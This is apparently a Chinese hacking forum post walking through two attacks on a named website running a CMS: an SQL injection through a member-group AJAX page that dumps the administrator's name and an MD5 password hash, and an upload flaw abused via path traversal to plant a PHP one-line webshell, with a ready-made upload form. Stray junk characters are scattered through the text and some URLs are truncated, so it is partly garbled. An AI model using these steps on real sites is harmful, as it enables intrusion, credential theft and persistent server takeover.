①注入漏洞。8 v. W- [8 n, r: l4 K
这站 http://www.political-security.com/2 J7 A7 S: K7 C3 A1 z
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
; R& {" \0 t I5 a U3 W n0 V9 hwww.political-security.com/data/mysql_error_trace.inc 爆后台
2 W$ _2 }" `0 d6 k ^1 @2 E# T然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。4 G2 U/ Z5 m* ?! c
然后写上语句 1 T2 ]1 {( {5 k: [
查看管理员帐号 r8 ^: N) z# M
http://www.political-security.co ... &membergroup=@`
( y1 g8 B6 t) V" R, F3 I: t: p, E' I% D& q! Q, L7 N: a
admin
4 B6 q0 I% _ G+ Z: ~
( I6 n% B+ X( T( j# _+ ^查看管理员密码# J1 g+ ]. _5 o, r/ k
http://www.political-security.co ... &membergroup=@`
+ A+ {! d/ o+ w& F8 b/ n
0 M6 k9 `. Q5 S! M$ [8d29b1ef9f8c5a5af429& N7 j: g5 [# @ E5 Q7 n
. H8 k* U8 d2 b! Y查看管理员密码
- j6 E2 z) d! I/ F8 B1 C- }
( ?& @( w0 K* u' O4 t% Q) I! `5 v得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5( g+ t2 x! x7 O- R: u
. Z. E" f" ]) P
8d2: D& ?% P+ p& E0 {+ S: R
9b1ef9f8c5a5af42
; l1 o2 e' J. b9; g$ p# w* ?* A% @ `6 W
2 J5 W. o# {* y1 h. U+ g+ icmd5没解出来 只好测试第二个方法
# F# m8 s( {# b( d$ U
3 R. @0 H$ h& o
N7 f; s w( K! M% h' ?②上传漏洞:
4 `6 B: [) d8 q$ {
. i9 V' o; M! @* C9 m& m: |只要登陆会员中心,然后访问页面链接
, x1 B2 u& @! x) y- v- F- Y. W1 D& B“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
0 m) Q# z2 N! a: Q& ?2 q$ R. z/ R
! D$ {+ S( V8 N+ T' I$ G( u6 N1 y如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
* |( I- b' f9 E6 I
0 H( [* @% \0 @: t$ @8 Z# p5 b于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm+ Z- U! D, d& `6 H' }# h# s6 i
X+ n/ S4 h. e' b j9 }<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>, _/ ^2 y* P6 X! M4 }
或者6 b; n$ {3 o: _% b" U
即可上传成功 |